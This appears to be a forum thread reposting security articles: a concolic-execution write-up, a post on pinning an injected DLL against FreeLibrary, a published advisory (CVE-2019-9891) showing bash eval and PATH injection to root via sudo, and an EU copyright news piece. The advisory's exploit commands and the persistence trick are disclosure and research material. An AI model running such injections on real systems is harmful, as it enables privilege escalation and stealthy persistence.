Once Manticore resolves the wrapper functions, hooks are attached to the target crypto primitives in the binary for concretization. As seen in Figure 2, we then harness Manticore's Unicorn fallback instruction emulator, UnicornEmulator, to emulate the call instruction made to the crypto primitive. UnicornEmulator concretizes symbolic inputs in the current state, executes the instruction under Unicorn, and stores modified registers back into the Manticore state.

All seems well, except this: if all the symbolic inputs are concretized, what will be solved after the concretization of the call instruction?

Restoring Symbolic State

Before our program tests implementations for equivalence, we introduce an unconstrained symbolic variable as the returned output from our concretized function. This variable guarantees a new symbolic input that continues to drive execution, but does not contain previously collected constraints. Mathy Vanhoef (2018) takes this approach to analyze cryptographic protocols over the WPA2 protocol. We do this in order to avoid the problem of timeouts due to complex SMT queries.

Fig 3. Writing a new unconstrained symbolic value into memory after concretization.

As seen in Figure 3, this is implemented through the concrete_checker hook at the SANDSHREW_* symbol, which performs the unconstrained re-symbolication if the hook detects the presence of symbolic input being passed to the wrapper. Once symbolic state is restored, sandshrew is able to continue executing symbolically with Manticore, forking once it has reached the equivalence-checking portion of the program, and generating solver solutions.

Results

Here is Sandshrew performing analysis on the example MD5 hash collision program from earlier:

The prototype implementation of Sandshrew currently exists here. With it comes a suite of test cases that check equivalence between a few real-world implementation libraries and the primitives that they implement.

Limitations

Sandshrew has a sizable test suite for critical cryptographic primitives. However, analysis still becomes stuck for many of the test cases. This may be due to the large statespace that needs to be explored for symbolic inputs. Arriving at a solution is probabilistic, as the Manticore z3 interface often times out.
With this, we can identify several areas of improvement for the future:

Add support for allowing users to supply concrete input sets to check before symbolic execution. With a proper input generator (e.g., radamsa), this potentially hybridizes Sandshrew into a fuzzer as well.

Implement Manticore function models for common cryptographic operations. This can increase performance during analysis and allows us to properly simulate execution under the Dolev-Yao verification model.

Reduce unnecessary code branching using opportunistic state merging.

Conclusion

Sandshrew is an interesting approach to attacking the problem of cryptographic verification, and demonstrates the awesome features of the Manticore API for efficiently creating security testing tools. While it is still a prototype and experimental, we invite you to contribute to its development, whether through optimizations or new example test cases.

Thank you

Working at Trail of Bits was an awesome experience, and offered me a lot of incentive to explore and learn new and exciting areas of security research. Working in an industry environment pushed me to understand difficult concepts and ideas, which I will take with me to my first year of college.

Sursa: https://blog.trailofbits.com/2019/04/01/performing-concolic-execution-on-cryptographic-primitives/
16. Make Your Dynamic Module Unfreeable (Anti-FreeLibrary)

1 minute read

Let's say your product injects a module into a target process. If the target process knows of the existence of your module, it can call the FreeLibrary function to unload it (assume that the reference count is one). One way to stay injected is to hook the FreeLibrary function and check the passed arguments every time the target process calls it. There is a way to get the same result without hooking.

When a process uses FreeLibrary to free a loaded module, FreeLibrary calls LdrUnloadDll, which is exported by ntdll. Inside LdrUnloadDll, the ProcessStaticImport field of the module's LDR_DATA_TABLE_ENTRY structure is checked to determine whether the module was dynamically loaded or not. The check happens inside the LdrpDecrementNodeLoadCountLockHeld function: if the ProcessStaticImport field is set, LdrpDecrementNodeLoadCountLockHeld returns without freeing the loaded module.

So, if we set the ProcessStaticImport field, FreeLibrary will not be able to unload our module. In this case, the module prints "Hello" every time it attaches to a process, and "Bye!" when it detaches.

Note: There is an officially supported way of doing the same thing: calling GetModuleHandleExA with the GET_MODULE_HANDLE_EX_FLAG_PIN flag. "The module stays loaded until the process is terminated, no matter how many times FreeLibrary is called."

Thanks to James Forshaw

whoami: @_qaz_qaz

Sursa: https://secrary.com/Random/anti_FreeLibrary/
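The officially supported pinning route is easy to try from a script. A minimal Python ctypes sketch (Windows-only; "target.dll" is a hypothetical name for a module already loaded in the current process):

import ctypes
from ctypes import wintypes

GET_MODULE_HANDLE_EX_FLAG_PIN = 0x00000001

kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
hmod = wintypes.HMODULE()

# Pin the module: it now stays loaded until the process exits,
# no matter how many times FreeLibrary is called on it.
ok = kernel32.GetModuleHandleExW(
    GET_MODULE_HANDLE_EX_FLAG_PIN,
    "target.dll",  # hypothetical module name
    ctypes.byref(hmod),
)
print(bool(ok), hex(hmod.value or 0))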
17. Today is the last day to sign up: http://www.cybersecuritychallenge.ro/
18. Fun stuff

https://9gag.com/gag/aMZXvB1
19. There are only a few days left to sign up. I think it's going to be interesting and worth it.
20. Advisory: Code Execution via Insecure Shell Function getopt_simple

RedTeam Pentesting discovered that the shell function "getopt_simple", as presented in the "Advanced Bash-Scripting Guide", allows execution of attacker-controlled commands.

Details
=======

Product: Advanced Bash-Scripting Guide
Affected Versions: all
Fixed Versions: -
Vulnerability Type: Code Execution
Security Risk: medium
Vendor URL: https://www.tldp.org/LDP/abs/html/
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-007
Advisory Status: private
CVE: CVE-2019-9891
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9891

Introduction
============

The document "Advanced Bash-Scripting Guide" [1] is a tutorial for writing shell scripts for Bash. It contains many example scripts together with in-depth explanations about how shell scripting works.

More Details
============

During a penetration test, RedTeam Pentesting was able to execute commands as an unprivileged user (www-data) on a server. Among others, it was discovered that this user was permitted to run the shell script "cleanup.sh" as root via "sudo":

------------------------------------------------------------------------
$ sudo -l
Matching Defaults entries for user on srv:
    env_reset, secure_path=/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on srv:
    (root) NOPASSWD: /usr/local/sbin/cleanup.sh
------------------------------------------------------------------------

The script "cleanup.sh" starts with the following code:

------------------------------------------------------------------------
#!/bin/bash

getopt_simple()
{
    until [ -z "$1" ]
    do
        if [ ${1:0:2} = '--' ]
        then
            tmp=${1:2}               # Strip off leading '--' . . .
            parameter=${tmp%%=*}     # Extract name.
            value=${tmp##*=}         # Extract value.
            eval $parameter=$value
        fi
        shift
    done
}

target=/tmp

# Pass all options to getopt_simple().
getopt_simple $*

# list files to clean
echo "listing files in $target"
find "$target" -mtime 1
------------------------------------------------------------------------

The function "getopt_simple" is used to set variables based on command-line flags which are passed to the script. Calling the script with the argument "--target=/tmp" sets the variable "$target" to the value "/tmp". The variable's value is then used in a call to "find". The source code of the "getopt_simple" function has been taken from the "Advanced Bash-Scripting Guide" [2]. It was also published as a book.

RedTeam Pentesting identified two different ways to exploit this function in order to run attacker-controlled commands as root. First, a flag can be specified in which either the name or the value contain a shell command. The call to "eval" will simply execute this command.

------------------------------------------------------------------------
$ sudo /usr/local/sbin/cleanup.sh '--redteam=foo;id'
uid=0(root) gid=0(root) groups=0(root)
listing files in /tmp

$ sudo /usr/local/sbin/cleanup.sh '--target=$(id)'
listing files in uid=0(root) gid=0(root) groups=0(root)
find: 'uid=0(root) gid=0(root) groups=0(root)': No such file or directory

$ sudo /usr/local/sbin/cleanup.sh '--target=$(ls${IFS}/)'
listing files in bin boot dev etc [...]
------------------------------------------------------------------------

Instead of injecting shell commands, the script can also be exploited by overwriting the "$PATH" variable:

------------------------------------------------------------------------
$ mkdir /tmp/redteam
$ cat <<EOF > /tmp/redteam/find
#!/bin/sh
echo "executed as root:"
/usr/bin/id
EOF
$ chmod +x /tmp/redteam/find
$ sudo /usr/local/sbin/cleanup.sh --PATH=/tmp/redteam
listing files in /tmp
executed as root:
uid=0(root) gid=0(root) groups=0(root)
------------------------------------------------------------------------

Workaround
==========

No workaround available.

Fix
===

Replace the function "getopt_simple" with the built-in function "getopts" or the program "getopt" from the util-linux package. Examples on how to do so are included in the same tutorial [3][4].

Security Risk
=============

If a script with attacker-controlled arguments uses the "getopt_simple" function, arbitrary commands may be invoked by the attackers. This is particularly interesting if a privilege boundary is crossed, for example in the context of "sudo". Overall, this vulnerability is rated as a medium risk.

Timeline
========

2019-02-18 Vulnerability identified
2019-03-20 Customer approved disclosure to vendor
2019-03-20 Author notified
2019-03-20 Author responded, document is not updated/maintained any more
2019-03-20 CVE ID requested
2019-03-21 CVE ID assigned
2019-03-26 Advisory released

References
==========

[1] https://www.tldp.org/LDP/abs/html/
[2] https://www.tldp.org/LDP/abs/html/string-manipulation.html#GETOPTSIMPLE
[3] https://www.tldp.org/LDP/abs/html/internal.html#EX33
[4] https://www.tldp.org/LDP/abs/html/extmisc.html#EX33A

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/

Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/

--
RedTeam Pentesting GmbH              Tel.: +49 241 510081-0
Dennewartstr. 25-27                  Fax : +49 241 510081-99
52068 Aachen                         https://www.redteam-pentesting.de
Germany

Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen

Sursa: Bugtraq
21. Goodbye to the internet as we know it. Article 11 and Article 13 have been accepted.

BY IULIAN MOCANU ON 26/03/2019

On 26 March 2019, the decisive vote on the new copyright legislation for the European Union's digital single market took place in the European Parliament. The vote was preceded by a proposal under which Article 11 and Article 13 would have been voted on individually, to determine whether or not they would become part of the legislation. That proposal resulted in a vote that ended 312 in favor of revising the two articles and 317 in favor of accepting them as they are. For some context: if 3 of the 12 representatives of Romania in the European Parliament who voted against this proposal had been in favor of it, the legislation would not have gone to a direct vote without the articles in question being discussed again. In the absence of this additional step, the legislation was put to a vote that ended with 348 members of parliament expressing approval and 274 expressing disapproval. The result is its acceptance in its current form. You can find here a detailed document with the actual votes.

Originally, the legislation was meant to offer somewhat more negotiating power and control to content creators and holders of intellectual property. However, according to critics, its current form does the opposite. Articles 11 and 13 could have very harmful effects on anything that represents competition for existing social networks, or for platforms delivering user-generated content. There is one more step before its actual implementation: a vote in the Council of the European Union, which will take place on April 9. If a majority is not obtained on that date, there is still hope that the legislation will not be adopted in its current form and will re-enter negotiations after the European Parliament elections in May. The actual implementation of the new legislation will take some time in any case, and the exact form in which the various articles will be implemented could still change; at one point Germany was considering dropping the internet-filter part from its version of the legislation. If you are wondering "How can it be a single digital market if some countries can decide not to have internet filters?", you have already demonstrated more capacity for thought than a few hundred people sent by public vote to the European Parliament.

The consequences of this new legislation will take shape over the coming months. You can read here a broader explanation of the concepts behind the new legislation, and especially of the basic ideas of Article 11 and Article 13. Also, towards the end of the week there will be a more detailed article about how this result came about, considered by a large part of the internet to be a disaster of epic proportions for humanity. [Reuters]

Sursa: https://zonait.ro/adio-internet-articolul-11-articolul-13/